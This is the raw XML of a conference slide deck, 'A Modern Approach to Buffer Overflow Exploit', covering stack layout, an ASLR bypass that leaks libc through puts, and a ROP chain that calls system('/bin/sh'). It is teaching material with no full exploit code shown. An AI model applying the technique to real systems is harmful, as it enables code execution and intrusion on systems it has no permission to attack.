            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The first item is the address of the main function in the binary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The second item is the address of the puts function in the binary and the puts function in the global offset table that will </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E3FA2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386929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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2592156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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Because of ASLR, we can't reliably predict the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function, therefore we need to leak the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> base address at the time of the binary is run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>We utilize the "puts" function inside the binary to achieve this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>After JUNKJUNK, we get to control RIP</a:t>
            </a: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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2811701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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363574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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34560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dirty="0"/>
              <a:t>After executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>puts_plts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, it will print the address of the puts function inside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> at the time of execution. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E3FA2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22601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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4144192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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1269721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r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pwntools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function ELF, we can get the offset of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> symbols.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Once we have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc_base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> address, we can calculate where the "system" function is along with "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>" string inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1417690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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84782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Buffer overflow occurs when the user can put more data than what the program intended to. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Calibri,Sans-Serif"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Writing data outside of the intended buffer can corrupt data, crash the program, or cause the execution of malicious code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E3FA2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1322982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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254259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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339187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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2546481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the second stage of the payload, we set up similar structure as seen before. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>However, instead of trying to leak the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> function, we want to execute system("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3695319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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297081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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78857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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2631693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demo, we achieved both Lateral Movement as well as Privilege Escalation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E3FA2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906636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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85961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Here's a simplified example on how the memory works. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Within the memory we have the Heap and the Stack. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The Heap grows from low memory address to high memory address. Whereas the Stack grows from high memory address to low memory address. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>There are two operations that we will focus on in this presentation: pop and push.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E3FA2388-27E1-4255-B3C5-FDD5E35C8C10}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="403166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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="267592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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72290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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383239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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76709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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2074123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09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417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530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892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807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91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571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61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066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dirty="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1258582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01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247194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1559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519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3676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028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198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833106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3cputs@GLIBC_2.2.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www.intel.com/content/dam/develop/external/us/en/documents/introduction-to-x64-assembly-181178.pdf" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/JonathanSalwan/ROPgadget" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://axcheron.github.io/linux-shellcode-101-from-hell-to-shell/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Return-oriented_programming"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adamdoupe.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/vulnerabilities/Buffer_Overflow" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://stackoverflow.com/questions/2535989/what-are-the-calling-conventions-for-unix-linux-system-calls-and-user-space-f" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Buffer_overflow" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aaronbloomfield.github.io/pdr/book/x86-64bit-ccc-chapter.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vc48372/KrakenKon2022.git"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6E2E74-06CA-4173-B7B0-204D27B1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9" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6970E1C9-C9F9-481F-894F-6978A15CF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1" y="965200"/>
            <a:ext cx="10286108" cy="4927600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95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95FB36-9688-49FD-8F26-AD607176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347" y="1129284"/>
            <a:ext cx="9957816" cy="45994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543" y="1588168"/>
            <a:ext cx="9149156" cy="2644719"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>A Modern Approach to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Buffer Overflow Exploit </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="4777740"/>
            <a:ext cx="8626640" cy="504682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="68580" tIns="68580" rIns="68580" bIns="68580" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Author: Vu Coughlin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE8DFF79-735F-44E8-8B9C-D1F28BED79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4663440"/>
            <a:ext cx="1828800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">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2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51395" y="2612570"/>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60C6A832-23F4-67F0-47E6-1E5C53F856E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5969804" y="264434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7" name="Rectangle: Rounded Corners 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0F9D5A4-4298-B513-2B46-273B199DA333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8901191" y="2538933"/>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3rd argument</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255846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93263" y="2964262"/>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476CD4A-19B6-1C02-DBE0-B28D51D544AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8901191" y="2890625"/>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2nd argument</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Arrow: Up 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E071F3-4EF7-A02F-6B75-DA995F382FF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6011672" y="2996035"/>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9287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76516" y="3341075"/>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161AE670-3F0A-E7EB-5000-248D6B332D31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6011672" y="3372848"/>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1" name="Rectangle: Rounded Corners 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF3BF8D9-67F1-C889-0E31-2E991CD6E182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8926312" y="3267438"/>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1st argument</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360880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Traditional Buffer Overflow Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle: Rounded Corners 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE257486-9F0E-DABC-8453-C030F86588BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3383029" y="1622259"/>
            <a:ext cx="5431473" cy="421204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2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
